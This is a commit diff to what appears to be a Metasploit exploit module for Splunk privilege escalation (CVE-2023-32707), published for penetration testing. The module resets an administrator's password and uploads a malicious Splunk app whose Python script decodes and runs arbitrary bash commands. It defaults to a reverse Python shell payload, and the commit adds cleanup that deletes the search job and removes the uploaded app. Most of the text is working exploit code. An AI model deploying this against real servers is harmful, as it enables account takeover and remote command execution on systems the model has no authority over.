Improve the cleanup method

- The cleanup methos is deleting the job and removing the app directory - Added a change dir command as an AutoRunScript just to avoid the error when trying to access the current directory in the session
rapid7 · Sep 22, 2023 · 4044835 · 4044835
1 parent 47d8e4d
commit 4044835
Showing 1 changed file with 36 additions and 31 deletions.
diff --git a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -48,7 +48,11 @@ def initialize(info = {})
             {
               'Arch' => ARCH_CMD,
               'Platform' => %w[linux unix],
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' }
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python',
+                # just to avoid the error because of the clean up: 'error retrieving current directory: getcwd: cannot access parent directories:'
+                'AutoRunScript' => 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'
+               }
             }
           ],
           [
@@ -69,8 +73,8 @@ def initialize(info = {})
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [
-            IOC_IN_LOGS,
-            ARTIFACTS_ON_DISK # app is uploaded
+            IOC_IN_LOGS, # requests are logged in the _audit index
+            # ARTIFACTS_ON_DISK # app is removed in the cleanup method
           ]
         },
         'DisclosureDate' => '2023-06-01'
@@ -83,7 +87,7 @@ def initialize(info = {})
         OptString.new('PASSWORD', [true, 'The password for the specified username']),
         OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),
         OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)', Rex::Text.rand_text_alpha(rand(8..12))]),
-        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/[\s|-]/, '_')])
+        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/[\s|-|_]/, '')])
       ]
     )
     # That depends on finding a strategy to distinguish commands that return output and commands that don't
@@ -138,28 +142,28 @@ def app_name
 
   # The cleanup method is removing the app before the session is closed and it is broking the session.
   #
-  # def cleanup
-  #   return unless session_created?
-  #   super
-  #   # Destroy job
-  #   vprint_status("Cleaning up: destroying job #{@job_id}")
-  #   send_request_cgi({
-  #     'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),
-  #     'method' => 'DELETE',
-  #     'cookie' => cookie
-  #   })
-  #   # Remove app
-  #   vprint_status("Cleaning up: removing app #{app_name}")
-  #   execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")
-  #   send_request_cgi({
-  #     'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),
-  #     'method' => 'POST',
-  #     'cookie' => cookie,
-  #     'vars_post' => {
-  #       'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']
-  #     }
-  #   })
-  # end
+  def cleanup
+    return unless session_created?
+    super
+    # Destroy job
+    vprint_status("Cleaning up: destroying job #{@job_id}")
+    send_request_cgi({
+      'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),
+      'method' => 'DELETE',
+      'cookie' => cookie
+    })
+    # Remove app
+    vprint_status("Cleaning up: removing app #{app_name}")
+    execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'vars_post' => {
+        'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']
+      }
+    })
+  end
 
   def exploit
     splunk_change_password(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])
@@ -359,18 +363,19 @@ def splunk_app
 
     # bin folder
     msf_exec_py = <<~EOF
-      import os, sys, base64
+      import sys, base64, subprocess
       import splunk.Intersplunk
 
       header = ['result']
       results = []
 
       try:
-          output = os.popen(base64.b64decode(sys.argv[1]).decode()).read()
-          results.append({'result': base64.b64encode(output.encode('utf-8')).decode('utf-8')})
+        proc = subprocess.Popen(['/bin/bash', '-c', base64.b64decode(sys.argv[1]).decode()], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
+        output = proc.stdout.read().decode('utf-8')
+        results.append({'result': base64.b64encode(output.encode('utf-8')).decode('utf-8')})
       except Exception as e:
-          error_msg = f'Error : {str(e)} '
-          results = splunk.Intersplunk.generateErrorResults(error_msg)
+        error_msg = f'Error : {str(e)} '
+        results = splunk.Intersplunk.generateErrorResults(error_msg)
 
       splunk.Intersplunk.outputResults(results, fields=header)
     EOF